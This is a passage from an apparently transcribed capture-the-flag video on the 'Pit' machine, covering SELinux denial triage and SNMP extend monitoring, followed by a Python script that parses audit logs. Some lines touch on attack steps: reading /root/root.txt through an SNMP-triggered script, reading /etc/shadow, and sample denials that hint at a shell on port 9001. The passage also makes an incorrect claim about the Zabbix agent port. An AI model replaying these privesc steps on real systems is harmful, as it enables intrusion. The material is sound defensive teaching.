of this, grep tor, we can see 9001 is one.

So I guess the last thing I want to talk about is blocking access to files. So in the video I
mentioned, if you tried going to /usr/local/monitoring and we attempted to read root.txt from this SNMP thing, it fails. So let's try this: check1.sh, cat /root/root.txt. Okay, and we have to snmpwalk -v2c -c public 10.10.10.241. We can disable that listener, and it's going to be like two to three minutes for this snmpwalk to finish, so I'm going to pause the video.

Okay, so now that the snmpwalk is finished, I can go up and, let's see, we see the cat root.txt, permission denied. So let's go over to this, and I realized what I did wrong with audit2allow: I need -i for input log. So if I do -i /var/log/audit/audit.log it will tell me all the things I need to do, but we'll go over that at the end of the video. So what we wanted to do is grep denied again from /var/log/audit/audit.log, and we're going to go to the last one, except not this D-Bus thing... we can go to, not this D-Bus thing, this cat, here we go, cat root.txt. So it's a read. So if I grep this for read, tail -1, not "greed", read, audit2why to tell me, and we just see it was missing the type enforcement rule to allow this. If I do audit2allow, it will tell me that we need to allow snmp the... I forget exactly what terminology this is, I want to say the admin_home role, to allow it to access these files, all the files in, like, ls -Z /root. We can... well, I guess I forgot to mention this: that -Z on commands is going to show the SELinux attributes of the process. So if I do ps -eaf and grep apache... it's an nginx, and we add a Z here, we can see it's using the... I think, I forget exactly what this is; this is domain, I think, this is role, this is user, I believe. But using the system_u user role, we're going to say, and the domain of httpd, and that's what is blocking access for a lot of things. So it doesn't... the actual services by default don't have access into home directories, because why would a service need access into a home directory? And that is essentially why we were able to quickly,
or not quickly, why that access was blocked by default. So if we go back to that audit2allow, all that's saying is, hey, if you want snmp to be able to read files in /root, you need to give it that access. And that's essentially what the audit2allow -i is doing on this audit log: it's reading that whole log and telling me everything I need to change. So I don't know what the dac_override capability is. We could also add the -w flag, and that's going to say why for everything, which is going to be a lot of text. So we see it's just a type enforcement rule, but I don't like using why for audit2allow because it's just a spool of text. But you can kind of look over this and see what types of things were blocked: this is allowing connect, bind to ports, get attributes, attribute... VMware Tools accessing a file, I don't know what that's about. I'm going to guess it was trying to read the actual flags, and this may be related to, like, flag rotation, but I'm not positive because it's the httpd user, which doesn't make sense to me. Crap. Let's do grep vmtools exec on /var/log/audit/audit.log. Let's see, vmtools, the path, read, it was doing an ls command. I'm not sure why, but that's what it was doing. So that's what this tells you, and again, not everything that's blocked is necessarily going to cause an issue, and you shouldn't always allow everything. But if you just want to get a secure system with SELinux running, I'd recommend running in permissive mode and then doing this audit2allow and just enabling everything, because that's going to be infinitely more secure than not running SELinux at all. And if you don't even want to do that, then just turn it to permissive mode, so at least you have things. One of the cool things is SELinux... I think, see, I'm not blocked. Let's see, id -Z, so I'm in an unconfined context, so that means SELinux doesn't apply to me. I'll show exporting at the end; I just thought, I was like, oh, I didn't show you how to export things, but we can do that at the
end. So I'm in an unconfined context right now for this, which is why I can read /etc/shadow. Normally, if I wanted to read /etc/shadow, I would need the specific permission to enable me doing so, because it's in this shadow_t thing, or the shadow domain. I think sysadmins by default don't have access to that, so let's try... well, they don't have access to read it; they have access to write it through passwd, maybe, I forget exactly how that works. But let's just see if we can demo it. I'm going to do semanage login -l, and this is going to show me the policies for the users. We can see that michelle is in the user context, and what this is doing... oh, MLS, this is like classification; this gets really confusing. But michelle's in the user context, so even if she had root's password... we can say passwd, and I'm going to set root's password to "password", like that. Okay, so let's go back here, michelle, clear, let's do su -, type password, permission denied. Wait, no, I did read it. Maybe she doesn't have access to sudo; I'm saying something wrong. But if SELinux was configured properly and she was just a user, that would not have been allowed. Let's do vi /etc/sudoers; maybe it's this that she's allowed to do. Curse the demo gods: michelle, ALL, ALL, so she can write everything, or she can run sudo. Now if I do sudo -l, michelle's password, I don't want to type that, that was a painful password. Let's just do passwd michelle, password, password, okay. Michelle can run... let's try doing sudo su, can I switch users, password, I can't, so... oh no, I can. Bad demo of SELinux; that's what I get for going live. But let's see if I can disable root from accessing shadow, and again, don't know if this is going to work. I'm going to do semanage, modify, -s, put them in the sys... the root. Let's see, semanage, do I do login -m? There we go. So if I do semanage login -l again, root is now sysadm_u. So if I do id -Z it's still unconfined, but if I SSH back in, please please please work, I
wonder if the file is not what... oh, come on, did I just, like, brick something? That's going to suck. Let's see, ls .ssh, do I have an authorized_keys file? I do, so I don't think that's the problem. /var/log/audit/audit.log, I should have just tailed. Come on, yeah, Ctrl-C, oh god, it won't let me Ctrl-C. This audit log is huge, and normally... there we go, grep denied on that log, tail -5. How do I say... normally I'd, like, kill that staged connection and go back in, but I may have locked myself out. What is this din transaction? Okay, let's see what this is. So where's that grep for this, tail -1, audit2why. It's probably just going to be a TE thing. Oh, so apparently sysadmins aren't allowed access to SSH in by default, so let's set this policy, and, come on, boom, there I go. id -Z, I am now a sysadm. If I cat /etc/shadow, permission denied, and all is good in the world. So I want to say that may be it. Actually, no, semanage export, and we can see our SELinux config. So we've set connect and connect_db to zero, I don't know what this unified thing is, we've enabled SSH sysadm login, we've set michelle to a user role, we set root to a sysadm role. So yeah, that is going to be the box. Hope you guys enjoyed that, and sorry if I said anything wrong with SELinux; not an expert in it. I actually bought a book that came yesterday; obviously I can't read it all in one day, but hopefully I'll know more about SELinux and can do a specific video on just SELinux in general. But yeah, apologies for the sloppy cut.

After doing the video, 0xdf and I were talking, and he got around the SNMP taking three minutes to get code execution for the privesc by just calling the MIB directly. And it turns out I've had instructions on how to do this as well, but when I was creating the video I was too lazy to just go to ipsec.rocks, type in MIBs, and click on one of these videos to see how to make snmpwalk readable. Long story short, you just run dpkg -l to see if the snmp-mibs-downloader is installed; we can see it is here.
I'd really like, like, less -S to put it all on one line, but we can see "ii", so it's installed. If you want to install it, you can just do sudo apt install snmp-mibs-downloader, and we'll see it's already installed. Once it's installed, you actually have to do a light configuration change because of weird licensing issues; it's actually hilarious: "As the snmp packages come without MIB files due to license reasons, loading of MIBs is disabled by default. If you want to enable them, just comment out this line." And now when I run snmpwalk, everything is translated, so we can see what things are, which is handy. So I'm just going to copy this to translated.out, we'll call it snmp-translated, and then I'm going to pause the video, and we're just going to look over all of these. Actually, something fun to do would be time here, so if you put time before the program it'll tell you how long it took to run. But yeah, so, be right back.

Okay, so we can see the SNMP finished, and it took two minutes and 44 seconds, so the time command is pretty handy. We look at snmp-translated.out and we can see everything. So if I, like, search for html, we can see the SNMP MIB dskPath.2 is what wrote this path. I'm not sure exactly what this is, but now if I Google it there's a chance it comes back; I'm actually not sure. You've got an OID reference, and maybe it will be something; it just says disk entry. So I'm not sure exactly why that's there, but it is this path where it's mounted. Is that a specific mount? Go here, do I still have access? If I do mount and grep www, oh yeah, so that is a specific mount, so that is why it's showing up in the SNMP library. Pretty cool. I guess that was just done so it does that. Well, in actual production I've seen things like this, like they have the data drive on a separate disk, so when it comes to rebuilding the application, let's say you wanted to upgrade from Ubuntu 16 to 18, if your web server is on a separate disk, you just update the OS and then mount the
same disk with your web directory, and you have a new OS running the same exact website. So in production environments you may see it; it's kind of going away because of containerization, but that is a real-world use case of doing something like that, I guess.

I'm going to go back to less -S, and I know I'm running less and then piping it to less because I'm too lazy to go back and erase something. But we can see the NET-SNMP-EXTEND-MIB is running the program, so the extend output, and it starts at monitoring. So if I just run this with the extend objects, the snmpwalk, it'll start there. What I'm doing with this period is I'm just saying start at the parent and query everything, but if I do NET-SNMP-EXTEND-MIB::nsExtendObjects, I think it will only run this. And I guess, because I'm curious and this video is already going longer than I expected, let's dig into exactly how this happened in SNMP. I'm going to guess it's an snmp directory. If I look at snmpd.conf, I'm going to search this for monitor, and there we go. So this is why: in this configuration, the extensible section talks about how to run shell scripts, extend monitoring /usr/bin/monitor, so that's why this application is being executed every time. And I'd often see people do things like this; normally it's not coded poorly, but a lot of health-checking things just query the SNMP of a box, because it's normally read-only. So you can have some type of health check that says yes, this application is running correctly, put that in a bash script, don't accept any input, and then when the monitoring application hits SNMP on their box, it checks that MIB and says yep, everything is running good, give it the green check mark and go on. If that doesn't return what it's expecting, then it would go red, send emails to people. So it's an old way to do monitoring. Nowadays there's, like, Zabbix, or there used to be Nagios that moved into Zabbix; now Nagios is still used, but Zabbix is more popular. And what that does is
it has a little agent that generally runs on port 566, and it talks back to the agent; the agent runs commands and gets the health check. It kind of eliminated SNMP, but for devices like networking gear that doesn't run Zabbix agents, SNMP is still used, so these things come in handy. Hopefully that little rant improved this video and I didn't just waste your time, but take care, guys, and I'll see you all next week.
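As an added example (not part of the video, the Pit box, or IppSec's own tooling), here is a small Python triage script that does by hand what the grep denied / audit2why / audit2allow workflow in the video does: it parses AVC denial records of the three kinds hit above (name_connect, name_bind and read), skips USER_AVC records such as the D-Bus noise, distinguishes permissive=1 (logged only) from permissive=0 (blocked), and prints a suggested fix. The audit.log lines are constructed for this example, and the boolean table and the semanage port -m suggestion are this script's own small heuristics, not what audit2why would necessarily print on a given system.

```python
"""
Triage SELinux AVC denials from an audit.log excerpt.

Mirrors the workflow in the video: find 'avc: denied' records, read the
source/target contexts, and decide whether a boolean (setsebool -P ...),
a port relabel (semanage port ...), or a type-enforcement allow rule
(what audit2allow would emit) is the fix.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed audit.log excerpt (assumption: not captured from the box). Field
# layout follows the kernel AVC record format; the USER_AVC line stands in for
# the D-Bus noise the video skips over.
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1632528000.101:2001): avc:  denied  { name_connect } for  pid=2711 comm="bash" dest=9001 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:tor_port_t:s0 tclass=tcp_socket permissive=0
type=AVC msg=audit(1632528060.202:2002): avc:  denied  { name_bind } for  pid=2718 comm="nc" src=9001 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:tor_port_t:s0 tclass=tcp_socket permissive=0
type=AVC msg=audit(1632528120.303:2003): avc:  denied  { read } for  pid=2750 comm="cat" name="root.txt" dev="dm-0" ino=1234 scontext=system_u:system_r:snmpd_t:s0 tcontext=unconfined_u:object_r:admin_home_t:s0 tclass=file permissive=0
type=USER_AVC msg=audit(1632528180.404:2004): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='avc:  received policyload notice (seqno=3) exe="/usr/lib/systemd/systemd" sauid=0 hostname=? addr=? terminal=?'
type=AVC msg=audit(1632528240.505:2005): avc:  denied  { name_connect } for  pid=2790 comm="bash" dest=3306 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:mysqld_port_t:s0 tclass=tcp_socket permissive=1
"""

# Only kernel AVC records; USER_AVC (userspace object managers like dbusd) are skipped.
AVC_RE = re.compile(r'^type=AVC .*?avc:\s+denied\s+\{\s*(?P<perms>[^}]+?)\s*\}\s+for\s+(?P<fields>.*)$')
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Booleans audit2why names for the common httpd outbound cases. The boolean
# names are real; limiting the table to these three is this example's choice.
HTTPD_CONNECT_BOOLEANS = {
    'mysqld_port_t': 'httpd_can_network_connect_db',
    'postgresql_port_t': 'httpd_can_network_connect_db',
    'ldap_port_t': 'httpd_can_connect_ldap',
}


@dataclass
class Denial:
    perms: List[str]
    pid: int
    comm: str
    source_type: str   # third field of scontext, e.g. httpd_t
    target_type: str   # third field of tcontext, e.g. tor_port_t
    tclass: str
    permissive: bool   # True => logged but not blocked
    fields: Dict[str, str] = field(default_factory=dict)


def context_type(ctx: str) -> str:
    """user:role:type:level -> type."""
    parts = ctx.split(':')
    return parts[2] if len(parts) >= 3 else ctx


def parse_avc(line: str) -> Optional[Denial]:
    """Parse one audit record; return None for anything that is not a kernel AVC denial."""
    m = AVC_RE.match(line.strip())
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m.group('fields'))}
    return Denial(
        perms=m.group('perms').split(),
        pid=int(fields.get('pid', '0')),
        comm=fields.get('comm', '?'),
        source_type=context_type(fields['scontext']),
        target_type=context_type(fields['tcontext']),
        tclass=fields['tclass'],
        permissive=fields.get('permissive') == '1',
        fields=fields,
    )


def suggest(d: Denial) -> str:
    """Pick the least-privilege fix: a boolean if one covers it, else a port relabel or TE rule."""
    if d.source_type == 'httpd_t' and 'name_connect' in d.perms and d.tclass == 'tcp_socket':
        boolean = HTTPD_CONNECT_BOOLEANS.get(d.target_type, 'httpd_can_network_connect')
        return f'setsebool -P {boolean} 1'
    if 'name_bind' in d.perms and d.target_type.endswith('_port_t'):
        # The port already has a type (here tor_port_t), so it must be modified, not added.
        port = d.fields.get('src', '?')
        return (f'semanage port -m -t http_port_t -p tcp {port}  '
                f'# or: allow {d.source_type} {d.target_type}:{d.tclass} {{ name_bind }};')
    perms = ' '.join(d.perms)
    return f'allow {d.source_type} {d.target_type}:{d.tclass} {{ {perms} }};'


def triage(log_text: str) -> List[Tuple[Denial, str]]:
    """Return (denial, suggested fix) for every kernel AVC denial in the text."""
    results = []
    for line in log_text.splitlines():
        d = parse_avc(line)
        if d is not None:
            results.append((d, suggest(d)))
    return results


def summarize(log_text: str) -> List[str]:
    """One human-readable line per denial, flagging permissive-mode records."""
    out = []
    for d, fix in triage(log_text):
        state = 'LOGGED (permissive=1, not blocked)' if d.permissive else 'BLOCKED'
        perms = ' '.join(d.perms)
        out.append(f'{state}: {d.comm}[{d.pid}] {d.source_type} -> {d.target_type}:{d.tclass} {{ {perms} }} => {fix}')
    return out


if __name__ == '__main__':
    for row in summarize(SAMPLE_AUDIT_LOG):
        print(row)
```

The booleans come first on purpose: as the video shows with httpd_can_network_connect_db, enabling a targeted boolean is narrower than the blanket allow rule audit2allow would write, and the TE rule is the fallback only when no boolean exists for the case.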
Info
Channel: IppSec
Views: 12,239
Rating: 4.9702234 out of 5
Id: IF5uhe1qR2I
Length: 87min 24sec (5244 seconds)
Published: Sat Sep 25 2021